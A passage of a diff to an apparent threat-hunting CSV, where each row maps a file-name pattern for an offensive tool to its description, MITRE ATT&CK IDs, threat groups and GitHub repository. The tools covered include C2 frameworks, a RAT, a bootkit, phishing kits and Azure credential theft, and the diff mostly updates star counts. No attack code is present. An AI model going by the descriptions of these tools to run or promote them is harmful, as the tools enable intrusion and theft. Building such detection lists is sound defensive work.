LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda 
- Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*redhuntlabs*","offensive_tool_keyword","redhuntlabs","documentation for offensive operation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*redhuntlabs/BucketLoot*","offensive_tool_keyword","BucketLoot","BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets- flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text","T1562.007 - T1119 - T1530","TA0006 - TA0010","N/A","N/A","Discovery","https://github.com/redhuntlabs/BucketLoot","1","1","N/A","7","3","232","28","2023-09-22T10:26:35Z","2023-07-17T09:06:14Z" "*RedHunt-OS*","offensive_tool_keyword","RedHunt-OS","Virtual Machine for Adversary Emulation and Threat Hunting by RedHunt Labs RedHunt OS aims to be a one stop shop for all your threat emulation and threat hunting needs by integrating attackers arsenal as well as defenders toolkit to actively identify the threats in your environment","T1583 - T1057 - T1016","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/redhuntlabs/RedHunt-OS","1","1","N/A","N/A","10","1170","185","2020-07-13T04:54:49Z","2018-03-14T19:31:16Z" "*redis-rce*","offensive_tool_keyword","redis-rce","A exploit for Redis 4.x/5.x RCE. 
inspired by Redis post-exploitation.","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Ridter/redis-rce","1","0","N/A","N/A","9","856","216","2021-11-30T14:55:59Z","2019-07-08T14:05:30Z" -"*redlotus.efi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","448","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" +"*redlotus.efi*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","1","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z" "*RedPeanut Smb server started*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*RedPeanut.Models*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*redpeanut.pfx*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" 
@@ -15684,52 +15863,52 @@ "*redskal/SharpAzbelt*","offensive_tool_keyword","SharpAzbelt","This is an attempt to port Azbelt by Leron Gray from Nim to C#. It can be used to enumerate and pilfer Azure-related credentials from Windows boxes and Azure IaaS resources","T1082 - T1003 - T1027 - T1110 - T1078","TA0006 - TA0007 - TA0005 - TA0004 - TA0003","N/A","N/A","Discovery - Collection","https://github.com/redskal/SharpAzbelt","1","1","N/A","8","1","23","6","2023-09-21T21:47:32Z","2023-09-21T21:44:03Z" "*redsocks-fw.sh stop*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" "*Red-Team-Infrastructure-Wiki.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" -"*Red-Teaming-Toolkit*","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","7958","2071","2023-06-01T08:38:39Z","2018-04-26T13:35:09Z" +"*Red-Teaming-Toolkit*","offensive_tool_keyword","Red-Teaming-Toolkit","A collection of open source and commercial tools that aid in red team operations. This repository will help you during red team engagement. If you want to contribute to this list send me a pull request","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/infosecn1nja/Red-Teaming-Toolkit","1","1","N/A","N/A","10","7962","2070","2023-06-01T08:38:39Z","2018-04-26T13:35:09Z" "*RedTeamOperations*","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/RedTeamOperations","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*RedWarden.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*RedWarden.test*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*redwarden_access.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" -"*redwarden_redirector.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","820","138","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedWarden.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*RedWarden.test*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_access.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*redwarden_redirector.log*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*ReelPhish*","offensive_tool_keyword","ReelPhish","ReelPhish consists of two components: the phishing site handling code and this script. The phishing site can be designed as desired. Sample PHP code is provided in /examplesitecode. The sample code will take a username and password from a HTTP POST request and transmit it to the phishing script. The phishing script listens on a local port and awaits a packet of credentials. Once credentials are received. the phishing script will open a new web browser instance and navigate to the desired URL (the actual site where you will be entering a users credentials). 
Credentials will be submitted by the web browser","T1566 - T1114 - T1071 - T1547 - T1546","TA0001 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/fireeye/ReelPhish","1","0","N/A","N/A","5","493","156","2023-08-11T01:40:07Z","2018-02-01T20:35:11Z" "*reflct_dll_inject.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","1","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" "*reflective_assembly_minified.ps1*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","private github repo","10","","N/A","","","" -"*reflective_dll.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*reflective_dll.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*reflective_dll.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*reflective_dll.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*reflective_dll.x64.dll*","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","1","N/A","10","10","148","21","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" -"*reflective_dll.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reflective_dll_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*reflective_pe_loader.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*reflective_dll.x64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
